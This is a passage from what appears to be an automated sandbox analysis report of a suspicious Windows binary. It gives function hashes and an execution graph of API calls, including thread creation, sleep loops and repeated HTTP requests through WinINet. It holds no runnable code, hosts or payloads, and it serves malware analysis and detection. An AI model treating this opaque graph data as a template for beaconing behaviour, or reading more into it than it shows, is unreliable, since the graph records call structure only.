                                                                                                                                                                  • Instruction Fuzzy Hash: FCD0A73360C014DD4A40CDD3312533D77E2A654310368483FE00BC6000E5246146F661
                                                                                                                                                                  Function 04CC0A14 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c4cb45e8162510d912d8e03fd8305cca8c652e0035da121d20915082830deb8e
                                                                                                                                                                  • Instruction ID: ab069e3563c0d5d56be088bae86381d459ec7fca902f81f1a34710cef883e462
                                                                                                                                                                  • Opcode Fuzzy Hash: c4cb45e8162510d912d8e03fd8305cca8c652e0035da121d20915082830deb8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FC02B67B0C400D90140ECD3905C37D3EDAF4A0030395083EE00289000F006D541F2D0

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 04CC0189 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c3479f1ba73882482101a458c00f0cff3db0015f766f8bea1261c52475e05b17
                                                                                                                                                                  • Instruction ID: 0331c31cd43960c4acc0c784bc30752ba43c1fb90c0473ca9d2f8f8fc46f158c
                                                                                                                                                                  • Opcode Fuzzy Hash: c3479f1ba73882482101a458c00f0cff3db0015f766f8bea1261c52475e05b17
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E21C0AB34D250EFE2468CA75E156FBBF6BE6D3230339053FD443C6583E605164AA161
                                                                                                                                                                  Function 04CC01E6 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ce2c9dc4b80af5c2c412a20536e15c6e5bd59a9e989d9e46e645870669e75c2c
                                                                                                                                                                  • Instruction ID: ba2ba3cc35c0ad7d5232d75be8b00b4e3ae0869617bfb7692da81415e306f629
                                                                                                                                                                  • Opcode Fuzzy Hash: ce2c9dc4b80af5c2c412a20536e15c6e5bd59a9e989d9e46e645870669e75c2c
                                                                                                                                                                  • Instruction Fuzzy Hash: A911C25B38D2A0DDD64704B756512F66F2BD59313033D052FD443C6993F205598D6122

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:10.5%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:4.8%
                                                                                                                                                                  Total number of Nodes:1779
                                                                                                                                                                  Total number of Limit Nodes:40
                                                                                                                                                                  execution_graph 13788 c27560 Sleep 13789 c275b3 13788->13789 13790 c2762e 13788->13790 13816 c3d041 13789->13816 13803 c37f30 13790->13803 13793 c2764a 13795 c37f30 RtlAllocateHeap 13793->13795 13796 c27663 13795->13796 13798 c37f30 RtlAllocateHeap 13796->13798 13800 c2767c CreateThread Sleep 13798->13800 13802 c276a9 shared_ptr 13800->13802 13897 c27400 13800->13897 13805 c37f4e 13803->13805 13807 c37f74 13803->13807 13805->13793 13806 c38063 13838 c22440 13806->13838 13808 c37fc8 13807->13808 13809 c37fed 13807->13809 13814 c37fd9 13807->13814 13808->13806 13827 c3d312 13808->13827 13813 c3d312 RtlAllocateHeap 13809->13813 13809->13814 13813->13814 13815 c38040 shared_ptr 13814->13815 13835 c391a0 13814->13835 13815->13793 13818 c3d051 13816->13818 13817 c275bd 13817->13790 13820 c3d57e 13817->13820 13818->13817 13859 c3d0c9 13818->13859 13863 c3d551 13820->13863 13823 c3cff7 13824 c3d007 13823->13824 13825 c3d0ab RtlWakeAllConditionVariable 13824->13825 13826 c3d0af 13824->13826 13825->13790 13826->13790 13830 c3d317 __fassign 13827->13830 13829 c3d331 13829->13814 13830->13829 13831 c22440 std::_Throw_future_error 13830->13831 13842 c58aa4 13830->13842 13834 c3d33d std::_Throw_future_error 13831->13834 13846 c537dc 13831->13846 13833 c22483 13833->13814 13834->13814 13850 c3c0e9 13835->13850 13839 c2244e std::_Throw_future_error 13838->13839 13840 c537dc ___std_exception_copy RtlAllocateHeap 13839->13840 13841 c22483 13840->13841 13845 c5af0b __fassign 13842->13845 13843 c5af34 RtlAllocateHeap 13844 c5af47 __dosmaperr 13843->13844 13843->13845 13844->13830 13845->13843 13845->13844 13847 c537e9 13846->13847 13849 c53806 ___std_exception_copy 13846->13849 13847->13847 13848 c58aa4 ___std_exception_copy RtlAllocateHeap 13847->13848 13847->13849 13848->13849 13849->13833 13853 c3c053 13850->13853 13852 c3c0fa std::_Throw_future_error 13856 c222a0 13853->13856 13855 c3c065 13855->13852 13857 c537dc ___std_exception_copy RtlAllocateHeap 13856->13857 13858 c222d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 13857->13858 13858->13855 13860 c3d0d7 SleepConditionVariableCS 13859->13860 13862 c3d0f0 13859->13862 13860->13862 13862->13818 13864 c3d560 13863->13864 13865 c3d567 13863->13865 13869 c5974f 13864->13869 13872 c597bb 13865->13872 13868 c27624 13868->13823 13870 c597bb RtlAllocateHeap 13869->13870 13871 c59761 13870->13871 13871->13868 13875 c594f1 13872->13875 13874 c597ec 13874->13868 13876 c594fd __fassign 13875->13876 13879 c5954c 13876->13879 13878 c59518 13878->13874 13880 c595d5 __fassign ___free_lconv_mon 13879->13880 13881 c59568 13879->13881 13880->13878 13881->13880 13884 c595b5 ___free_lconv_mon 13881->13884 13885 c5ecb6 13881->13885 13883 c5ecb6 RtlAllocateHeap 13883->13880 13884->13880 13884->13883 13886 c5ecc3 13885->13886 13888 c5eccf __cftof __dosmaperr 13886->13888 13889 c64ecf 13886->13889 13888->13884 13890 c64edc 13889->13890 13891 c64ee4 __dosmaperr __fassign ___free_lconv_mon 13889->13891 13893 c5af0b 13890->13893 13891->13888 13895 c5af47 __dosmaperr 13893->13895 13896 c5af19 __fassign 13893->13896 13894 c5af34 RtlAllocateHeap 13894->13895 13894->13896 13895->13891 13896->13894 13896->13895 13910 c37870 13897->13910 13899 c27435 13900 c37870 RtlAllocateHeap 13899->13900 13901 c27448 13900->13901 13902 c37870 RtlAllocateHeap 13901->13902 13903 c27458 13902->13903 13904 c37870 RtlAllocateHeap 13903->13904 13905 c2746d 13904->13905 13906 c37870 RtlAllocateHeap 13905->13906 13907 c27482 13906->13907 13908 c37870 RtlAllocateHeap 13907->13908 13909 c27494 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 13908->13909 13911 c37896 13910->13911 13912 c3789d 13911->13912 13913 c378d2 13911->13913 13914 c378f1 13911->13914 13912->13899 13915 c37929 13913->13915 13916 c378d9 13913->13916 13919 c3d312 RtlAllocateHeap 13914->13919 13920 c378df __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13914->13920 13917 c22440 RtlAllocateHeap 13915->13917 13918 c3d312 RtlAllocateHeap 13916->13918 13917->13920 13918->13920 13919->13920 13920->13899 14125 c290e0 14126 c29115 14125->14126 14126->14126 14127 c37f30 RtlAllocateHeap 14126->14127 14128 c29148 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14127->14128 15482 c28c60 15483 c28cb0 15482->15483 15484 c37870 RtlAllocateHeap 15483->15484 15485 c28cbf 15484->15485 15486 c25b20 RtlAllocateHeap 15485->15486 15487 c28cca 15486->15487 15488 c37f30 RtlAllocateHeap 15487->15488 15489 c28d1c 15488->15489 15490 c38150 RtlAllocateHeap 15489->15490 15491 c28d2e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15490->15491 15492 c28a60 15493 c28aac 15492->15493 15494 c37870 RtlAllocateHeap 15493->15494 15495 c28abc 15494->15495 15496 c25b20 RtlAllocateHeap 15495->15496 15497 c28ac7 15496->15497 15498 c37f30 RtlAllocateHeap 15497->15498 15499 c28b13 15498->15499 15500 c37f30 RtlAllocateHeap 15499->15500 15501 c28b65 15500->15501 15502 c38150 RtlAllocateHeap 15501->15502 15503 c28b77 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15502->15503 15504 c2c800 15505 c2c857 15504->15505 15510 c38d10 15505->15510 15507 c2c86c 15508 c38d10 RtlAllocateHeap 15507->15508 15509 c2c8a8 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15508->15509 15511 c38d35 15510->15511 15512 c38e5f 15510->15512 15516 c38da6 15511->15516 15517 c38d7c 15511->15517 15513 c391a0 RtlAllocateHeap 15512->15513 15514 c38e64 15513->15514 15515 c22440 RtlAllocateHeap 15514->15515 15521 c38d8d shared_ptr __cftof 15515->15521 15520 c3d312 RtlAllocateHeap 15516->15520 15516->15521 15517->15514 15518 c38d87 15517->15518 15519 c3d312 RtlAllocateHeap 15518->15519 15519->15521 15520->15521 15521->15507 15583 c27780 15596 c385b0 15583->15596 15585 c277c1 15586 c38250 RtlAllocateHeap 15585->15586 15589 c277d3 shared_ptr 15586->15589 15587 c37870 RtlAllocateHeap 15588 c27831 15587->15588 15590 c37870 RtlAllocateHeap 15588->15590 15589->15587 15595 c27876 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15589->15595 15591 c2784c 15590->15591 15592 c25b20 RtlAllocateHeap 15591->15592 15593 c27853 15592->15593 15594 c37f30 RtlAllocateHeap 15593->15594 15594->15595 15597 c38610 15596->15597 15597->15597 15598 c375d0 RtlAllocateHeap 15597->15598 15599 c38629 15598->15599 15600 c38e70 RtlAllocateHeap 15599->15600 15601 c38644 15599->15601 15600->15601 15602 c38e70 RtlAllocateHeap 15601->15602 15604 c38699 15601->15604 15603 c386e1 15602->15603 15603->15585 15604->15585 14129 c36ae0 14132 c36b10 14129->14132 14130 c37870 RtlAllocateHeap 14130->14132 14131 c25b20 RtlAllocateHeap 14131->14132 14132->14130 14132->14131 14135 c346c0 14132->14135 14134 c36b5c Sleep 14134->14132 14136 c346fb 14135->14136 14247 c34d80 shared_ptr 14135->14247 14138 c37870 RtlAllocateHeap 14136->14138 14136->14247 14137 c34e69 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14137->14134 14139 c3471c 14138->14139 14402 c25b20 14139->14402 14141 c34723 14143 c37870 RtlAllocateHeap 14141->14143 14145 c34735 14143->14145 14144 c34f25 14770 c26920 14144->14770 14147 c37870 RtlAllocateHeap 14145->14147 14148 c34747 14147->14148 14409 c2bd60 14148->14409 14150 c34753 14152 c37870 RtlAllocateHeap 14150->14152 14151 c34fee shared_ptr 14780 c27d00 14151->14780 14155 c34768 14152->14155 14154 c34f35 shared_ptr 14154->14151 14178 c36ab6 14154->14178 14157 c37870 RtlAllocateHeap 14155->14157 14156 c34ffd 14853 c24570 14156->14853 14159 c34780 14157->14159 14161 c25b20 RtlAllocateHeap 14159->14161 14160 c3500a 14857 c282b0 14160->14857 14164 c34787 14161->14164 14163 c35016 14165 c24570 RtlAllocateHeap 14163->14165 14433 c284b0 14164->14433 14167 c35023 14165->14167 14173 c24570 RtlAllocateHeap 14167->14173 14168 c34793 14170 c34a19 14168->14170 14171 c37870 RtlAllocateHeap 14168->14171 14169 c25b20 RtlAllocateHeap 14169->14178 14172 c37870 RtlAllocateHeap 14170->14172 14239 c34eac 14170->14239 14175 c347af 14171->14175 14176 c34a3f 14172->14176 14177 c35040 14173->14177 14174 c37870 RtlAllocateHeap 14174->14178 14179 c37870 RtlAllocateHeap 14175->14179 14180 c37870 RtlAllocateHeap 14176->14180 14181 c37870 RtlAllocateHeap 14177->14181 14178->14169 14178->14174 14189 c346c0 17 API calls 14178->14189 14182 c347c7 14179->14182 14183 c34a54 14180->14183 14184 c3505e 14181->14184 14185 c25b20 RtlAllocateHeap 14182->14185 14186 c37870 RtlAllocateHeap 14183->14186 14188 c25b20 RtlAllocateHeap 14184->14188 14190 c347ce 14185->14190 14187 c34a66 14186->14187 14192 c2bd60 6 API calls 14187->14192 14193 c35065 14188->14193 14194 c36b5c Sleep 14189->14194 14191 c284b0 RtlAllocateHeap 14190->14191 14195 c347da 14191->14195 14196 c34a72 14192->14196 14197 c37870 RtlAllocateHeap 14193->14197 14194->14178 14195->14170 14200 c37870 RtlAllocateHeap 14195->14200 14198 c37870 RtlAllocateHeap 14196->14198 14199 c3507a 14197->14199 14201 c34a87 14198->14201 14202 c25b20 RtlAllocateHeap 14199->14202 14203 c347f7 14200->14203 14204 c37870 RtlAllocateHeap 14201->14204 14205 c35081 14202->14205 14206 c25b20 RtlAllocateHeap 14203->14206 14207 c34a9f 14204->14207 14869 c25c60 14205->14869 14213 c347ff 14206->14213 14209 c25b20 RtlAllocateHeap 14207->14209 14210 c34aa6 14209->14210 14211 c284b0 RtlAllocateHeap 14210->14211 14214 c34ab2 14211->14214 14212 c35098 14212->14212 14218 c37f30 RtlAllocateHeap 14212->14218 14215 c3484b 14213->14215 14216 c34e8e 14213->14216 14220 c37870 RtlAllocateHeap 14214->14220 14214->14247 14219 c37f30 RtlAllocateHeap 14215->14219 14737 c38070 14216->14737 14229 c350fd 14218->14229 14228 c34869 shared_ptr 14219->14228 14221 c34ace 14220->14221 14222 c37870 RtlAllocateHeap 14221->14222 14223 c34ae6 14222->14223 14224 c25b20 RtlAllocateHeap 14223->14224 14227 c34aed 14224->14227 14225 c34e93 14232 c34ea7 14225->14232 14740 c3c0c9 14225->14740 14226 c37870 RtlAllocateHeap 14230 c348f6 14226->14230 14231 c284b0 RtlAllocateHeap 14227->14231 14228->14225 14228->14226 14894 c37c50 14229->14894 14235 c25b20 RtlAllocateHeap 14230->14235 14236 c34af9 14231->14236 14237 c38070 RtlAllocateHeap 14232->14237 14243 c348fe 14235->14243 14241 c37870 RtlAllocateHeap 14236->14241 14236->14247 14237->14239 14238 c35169 14907 c38090 14238->14907 14743 c3c109 14239->14743 14244 c34b16 14241->14244 14245 c37f30 RtlAllocateHeap 14243->14245 14246 c25b20 RtlAllocateHeap 14244->14246 14251 c34959 shared_ptr 14245->14251 14249 c34b1e 14246->14249 14247->14137 14746 c265b0 14247->14746 14248 c351a5 shared_ptr 14253 c37f30 RtlAllocateHeap 14248->14253 14249->14232 14252 c34b6a 14249->14252 14251->14170 14251->14225 14439 c29820 14251->14439 14254 c37f30 RtlAllocateHeap 14252->14254 14258 c3526d shared_ptr 14253->14258 14261 c34b88 shared_ptr 14254->14261 14255 c349e5 __dosmaperr 14255->14170 14444 c58979 14255->14444 14257 c37870 RtlAllocateHeap 14262 c34c15 14257->14262 14259 c24570 RtlAllocateHeap 14258->14259 14263 c3530d 14259->14263 14261->14247 14261->14257 14264 c25b20 RtlAllocateHeap 14262->14264 14265 c37870 RtlAllocateHeap 14263->14265 14268 c34c1d 14264->14268 14266 c35327 14265->14266 14267 c25b20 RtlAllocateHeap 14266->14267 14269 c35332 14267->14269 14270 c37f30 RtlAllocateHeap 14268->14270 14271 c24570 RtlAllocateHeap 14269->14271 14279 c34c78 shared_ptr 14270->14279 14272 c35347 14271->14272 14273 c37870 RtlAllocateHeap 14272->14273 14274 c3535b 14273->14274 14276 c25b20 RtlAllocateHeap 14274->14276 14275 c37870 RtlAllocateHeap 14278 c34d07 14275->14278 14277 c35366 14276->14277 14280 c37870 RtlAllocateHeap 14277->14280 14281 c37870 RtlAllocateHeap 14278->14281 14279->14247 14279->14275 14282 c35384 14280->14282 14283 c34d1c 14281->14283 14284 c25b20 RtlAllocateHeap 14282->14284 14285 c37870 RtlAllocateHeap 14283->14285 14286 c3538f 14284->14286 14287 c34d37 14285->14287 14288 c37870 RtlAllocateHeap 14286->14288 14289 c25b20 RtlAllocateHeap 14287->14289 14290 c353ad 14288->14290 14291 c34d3e 14289->14291 14292 c25b20 RtlAllocateHeap 14290->14292 14295 c37f30 RtlAllocateHeap 14291->14295 14293 c353b8 14292->14293 14294 c37870 RtlAllocateHeap 14293->14294 14296 c353d6 14294->14296 14297 c34d77 14295->14297 14298 c25b20 RtlAllocateHeap 14296->14298 14448 c342a0 14297->14448 14300 c353e1 14298->14300 14301 c37870 RtlAllocateHeap 14300->14301 14302 c353ff 14301->14302 14303 c25b20 RtlAllocateHeap 14302->14303 14304 c3540a 14303->14304 14305 c37870 RtlAllocateHeap 14304->14305 14306 c35428 14305->14306 14307 c25b20 RtlAllocateHeap 14306->14307 14308 c35433 14307->14308 14309 c37870 RtlAllocateHeap 14308->14309 14310 c35451 14309->14310 14311 c25b20 RtlAllocateHeap 14310->14311 14312 c3545c 14311->14312 14313 c37870 RtlAllocateHeap 14312->14313 14314 c3547a 14313->14314 14315 c25b20 RtlAllocateHeap 14314->14315 14316 c35485 14315->14316 14317 c37870 RtlAllocateHeap 14316->14317 14318 c354a1 14317->14318 14319 c25b20 RtlAllocateHeap 14318->14319 14320 c354ac 14319->14320 14321 c37870 RtlAllocateHeap 14320->14321 14322 c354c3 14321->14322 14323 c25b20 RtlAllocateHeap 14322->14323 14324 c354ce 14323->14324 14325 c37870 RtlAllocateHeap 14324->14325 14326 c354e5 14325->14326 14327 c25b20 RtlAllocateHeap 14326->14327 14328 c354f0 14327->14328 14329 c37870 RtlAllocateHeap 14328->14329 14330 c3550c 14329->14330 14331 c25b20 RtlAllocateHeap 14330->14331 14332 c35517 14331->14332 14912 c38250 14332->14912 14334 c3552b 14916 c38150 14334->14916 14336 c3553f 14337 c38150 RtlAllocateHeap 14336->14337 14338 c35553 14337->14338 14339 c38150 RtlAllocateHeap 14338->14339 14340 c35567 14339->14340 14341 c38250 RtlAllocateHeap 14340->14341 14342 c3557b 14341->14342 14343 c38150 RtlAllocateHeap 14342->14343 14344 c3558f 14343->14344 14345 c38250 RtlAllocateHeap 14344->14345 14346 c355a3 14345->14346 14347 c38150 RtlAllocateHeap 14346->14347 14348 c355b7 14347->14348 14349 c38250 RtlAllocateHeap 14348->14349 14350 c355cb 14349->14350 14351 c38150 RtlAllocateHeap 14350->14351 14352 c355df 14351->14352 14353 c38250 RtlAllocateHeap 14352->14353 14354 c355f3 14353->14354 14355 c38150 RtlAllocateHeap 14354->14355 14356 c35607 14355->14356 14357 c38250 RtlAllocateHeap 14356->14357 14358 c3561b 14357->14358 14359 c38150 RtlAllocateHeap 14358->14359 14360 c3562f 14359->14360 14361 c38250 RtlAllocateHeap 14360->14361 14362 c35643 14361->14362 14363 c38150 RtlAllocateHeap 14362->14363 14364 c35657 14363->14364 14365 c38250 RtlAllocateHeap 14364->14365 14366 c3566b 14365->14366 14367 c38150 RtlAllocateHeap 14366->14367 14368 c3567f 14367->14368 14369 c38250 RtlAllocateHeap 14368->14369 14370 c35693 14369->14370 14371 c38150 RtlAllocateHeap 14370->14371 14372 c356a7 14371->14372 14373 c38150 RtlAllocateHeap 14372->14373 14374 c356bb 14373->14374 14375 c38150 RtlAllocateHeap 14374->14375 14376 c356cf 14375->14376 14377 c38250 RtlAllocateHeap 14376->14377 14382 c356e3 shared_ptr 14377->14382 14378 c36377 14380 c37870 RtlAllocateHeap 14378->14380 14379 c364cb 14381 c37870 RtlAllocateHeap 14379->14381 14383 c3638d 14380->14383 14384 c364e0 14381->14384 14382->14378 14382->14379 14385 c25b20 RtlAllocateHeap 14383->14385 14386 c37870 RtlAllocateHeap 14384->14386 14388 c36398 14385->14388 14387 c364f5 14386->14387 14924 c24960 14387->14924 14390 c38250 RtlAllocateHeap 14388->14390 14401 c363ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14390->14401 14391 c36504 14931 c375d0 14391->14931 14393 c36646 14394 c37870 RtlAllocateHeap 14393->14394 14395 c3665c 14394->14395 14396 c25b20 RtlAllocateHeap 14395->14396 14398 c36667 14396->14398 14397 c38bd0 RtlAllocateHeap 14399 c3654b 14397->14399 14400 c38150 RtlAllocateHeap 14398->14400 14399->14393 14399->14397 14400->14401 14401->14134 14943 c25850 14402->14943 14406 c25b7a 14962 c24af0 14406->14962 14408 c25b8b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14408->14141 14410 c2bdb2 14409->14410 14411 c2c1a1 14409->14411 14410->14411 14413 c2bdc6 InternetOpenW InternetConnectA 14410->14413 14412 c37f30 RtlAllocateHeap 14411->14412 14418 c2c14e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14412->14418 14414 c37870 RtlAllocateHeap 14413->14414 14415 c2be3d 14414->14415 14416 c25b20 RtlAllocateHeap 14415->14416 14417 c2be48 HttpOpenRequestA 14416->14417 14420 c2be71 shared_ptr 14417->14420 14418->14150 14421 c37870 RtlAllocateHeap 14420->14421 14422 c2bed9 14421->14422 14423 c25b20 RtlAllocateHeap 14422->14423 14424 c2bee4 14423->14424 14425 c37870 RtlAllocateHeap 14424->14425 14426 c2befd 14425->14426 14427 c25b20 RtlAllocateHeap 14426->14427 14428 c2bf08 HttpSendRequestA 14427->14428 14430 c2bf2b shared_ptr 14428->14430 14431 c2bfb3 InternetReadFile 14430->14431 14432 c2bfda 14431->14432 14437 c285d0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14433->14437 14438 c28505 shared_ptr 14433->14438 14434 c28697 14436 c38070 RtlAllocateHeap 14434->14436 14435 c37f30 RtlAllocateHeap 14435->14438 14436->14437 14437->14168 14438->14434 14438->14435 14438->14437 14440 c37870 RtlAllocateHeap 14439->14440 14441 c2984e 14440->14441 14442 c25b20 RtlAllocateHeap 14441->14442 14443 c29857 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr __cftof 14442->14443 14443->14255 14445 c58994 14444->14445 14988 c586d7 14445->14988 14447 c34a0d 14447->14170 14447->14225 14449 c37870 RtlAllocateHeap 14448->14449 14450 c342e2 14449->14450 14451 c37870 RtlAllocateHeap 14450->14451 14452 c342f4 14451->14452 14453 c284b0 RtlAllocateHeap 14452->14453 14454 c342fd 14453->14454 14455 c34556 14454->14455 14480 c34308 shared_ptr 14454->14480 14456 c37870 RtlAllocateHeap 14455->14456 14457 c34567 14456->14457 14458 c37870 RtlAllocateHeap 14457->14458 14460 c3457c 14458->14460 14459 c346b3 14461 c38070 RtlAllocateHeap 14459->14461 14463 c37870 RtlAllocateHeap 14460->14463 14467 c34520 shared_ptr 14461->14467 14462 c3468e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14462->14247 14464 c3458e 14463->14464 14466 c33550 4 API calls 14464->14466 14466->14467 14467->14462 14469 c37870 RtlAllocateHeap 14467->14469 14580 c34d80 shared_ptr 14467->14580 14468 c34e69 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14468->14247 14470 c3471c 14469->14470 14471 c25b20 RtlAllocateHeap 14470->14471 14472 c34723 14471->14472 14474 c37870 RtlAllocateHeap 14472->14474 14473 c265b0 5 API calls 14475 c34f25 14473->14475 14476 c34735 14474->14476 14477 c26920 RtlAllocateHeap 14475->14477 14478 c37870 RtlAllocateHeap 14476->14478 14484 c34f35 shared_ptr 14477->14484 14479 c34747 14478->14479 14481 c2bd60 6 API calls 14479->14481 14480->14459 14480->14467 14487 c37870 RtlAllocateHeap 14480->14487 14499 c37f30 RtlAllocateHeap 14480->14499 15014 c391b0 14480->15014 15019 c33550 14480->15019 14482 c34753 14481->14482 14483 c37870 RtlAllocateHeap 14482->14483 14486 c34768 14483->14486 14490 c34fee shared_ptr 14484->14490 14519 c36ab6 14484->14519 14485 c27d00 9 API calls 14488 c34ffd 14485->14488 14489 c37870 RtlAllocateHeap 14486->14489 14487->14480 14491 c24570 RtlAllocateHeap 14488->14491 14492 c34780 14489->14492 14490->14485 14494 c3500a 14491->14494 14495 c25b20 RtlAllocateHeap 14492->14495 14496 c282b0 2 API calls 14494->14496 14498 c34787 14495->14498 14497 c35016 14496->14497 14500 c24570 RtlAllocateHeap 14497->14500 14501 c284b0 RtlAllocateHeap 14498->14501 14499->14480 14502 c35023 14500->14502 14503 c34793 14501->14503 14507 c24570 RtlAllocateHeap 14502->14507 14504 c34a19 14503->14504 14505 c37870 RtlAllocateHeap 14503->14505 14506 c37870 RtlAllocateHeap 14504->14506 14574 c34eac 14504->14574 14509 c347af 14505->14509 14510 c34a3f 14506->14510 14511 c35040 14507->14511 14508 c37870 RtlAllocateHeap 14508->14519 14512 c37870 RtlAllocateHeap 14509->14512 14513 c37870 RtlAllocateHeap 14510->14513 14514 c37870 RtlAllocateHeap 14511->14514 14516 c347c7 14512->14516 14517 c34a54 14513->14517 14518 c3505e 14514->14518 14515 c25b20 RtlAllocateHeap 14515->14519 14520 c25b20 RtlAllocateHeap 14516->14520 14521 c37870 RtlAllocateHeap 14517->14521 14523 c25b20 RtlAllocateHeap 14518->14523 14519->14508 14519->14515 14524 c346c0 17 API calls 14519->14524 14525 c347ce 14520->14525 14522 c34a66 14521->14522 14527 c2bd60 6 API calls 14522->14527 14528 c35065 14523->14528 14529 c36b5c Sleep 14524->14529 14526 c284b0 RtlAllocateHeap 14525->14526 14530 c347da 14526->14530 14531 c34a72 14527->14531 14532 c37870 RtlAllocateHeap 14528->14532 14529->14519 14530->14504 14535 c37870 RtlAllocateHeap 14530->14535 14533 c37870 RtlAllocateHeap 14531->14533 14534 c3507a 14532->14534 14536 c34a87 14533->14536 14537 c25b20 RtlAllocateHeap 14534->14537 14538 c347f7 14535->14538 14539 c37870 RtlAllocateHeap 14536->14539 14540 c35081 14537->14540 14541 c25b20 RtlAllocateHeap 14538->14541 14542 c34a9f 14539->14542 14543 c25c60 5 API calls 14540->14543 14548 c347ff 14541->14548 14544 c25b20 RtlAllocateHeap 14542->14544 14547 c35098 14543->14547 14545 c34aa6 14544->14545 14546 c284b0 RtlAllocateHeap 14545->14546 14549 c34ab2 14546->14549 14547->14547 14553 c37f30 RtlAllocateHeap 14547->14553 14550 c3484b 14548->14550 14551 c34e8e 14548->14551 14555 c37870 RtlAllocateHeap 14549->14555 14549->14580 14554 c37f30 RtlAllocateHeap 14550->14554 14552 c38070 RtlAllocateHeap 14551->14552 14560 c34e93 14552->14560 14564 c350fd 14553->14564 14563 c34869 shared_ptr 14554->14563 14556 c34ace 14555->14556 14557 c37870 RtlAllocateHeap 14556->14557 14558 c34ae6 14557->14558 14559 c25b20 RtlAllocateHeap 14558->14559 14562 c34aed 14559->14562 14567 c34ea7 14560->14567 14568 c3c0c9 std::_Xinvalid_argument RtlAllocateHeap 14560->14568 14561 c37870 RtlAllocateHeap 14565 c348f6 14561->14565 14566 c284b0 RtlAllocateHeap 14562->14566 14563->14560 14563->14561 14569 c37c50 RtlAllocateHeap 14564->14569 14570 c25b20 RtlAllocateHeap 14565->14570 14571 c34af9 14566->14571 14572 c38070 RtlAllocateHeap 14567->14572 14568->14567 14573 c35169 14569->14573 14578 c348fe 14570->14578 14576 c37870 RtlAllocateHeap 14571->14576 14571->14580 14572->14574 14575 c38090 RtlAllocateHeap 14573->14575 14577 c3c109 RtlAllocateHeap 14574->14577 14583 c351a5 shared_ptr 14575->14583 14579 c34b16 14576->14579 14577->14580 14581 c37f30 RtlAllocateHeap 14578->14581 14582 c25b20 RtlAllocateHeap 14579->14582 14580->14468 14580->14473 14586 c34959 shared_ptr 14581->14586 14584 c34b1e 14582->14584 14588 c37f30 RtlAllocateHeap 14583->14588 14584->14567 14587 c34b6a 14584->14587 14585 c29820 RtlAllocateHeap 14590 c349e5 __dosmaperr 14585->14590 14586->14504 14586->14560 14586->14585 14589 c37f30 RtlAllocateHeap 14587->14589 14593 c3526d shared_ptr 14588->14593 14596 c34b88 shared_ptr 14589->14596 14590->14504 14591 c58979 3 API calls 14590->14591 14595 c34a0d 14591->14595 14592 c37870 RtlAllocateHeap 14597 c34c15 14592->14597 14594 c24570 RtlAllocateHeap 14593->14594 14598 c3530d 14594->14598 14595->14504 14595->14560 14596->14580 14596->14592 14599 c25b20 RtlAllocateHeap 14597->14599 14600 c37870 RtlAllocateHeap 14598->14600 14603 c34c1d 14599->14603 14601 c35327 14600->14601 14602 c25b20 RtlAllocateHeap 14601->14602 14604 c35332 14602->14604 14605 c37f30 RtlAllocateHeap 14603->14605 14606 c24570 RtlAllocateHeap 14604->14606 14614 c34c78 shared_ptr 14605->14614 14607 c35347 14606->14607 14608 c37870 RtlAllocateHeap 14607->14608 14609 c3535b 14608->14609 14611 c25b20 RtlAllocateHeap 14609->14611 14610 c37870 RtlAllocateHeap 14613 c34d07 14610->14613 14612 c35366 14611->14612 14615 c37870 RtlAllocateHeap 14612->14615 14616 c37870 RtlAllocateHeap 14613->14616 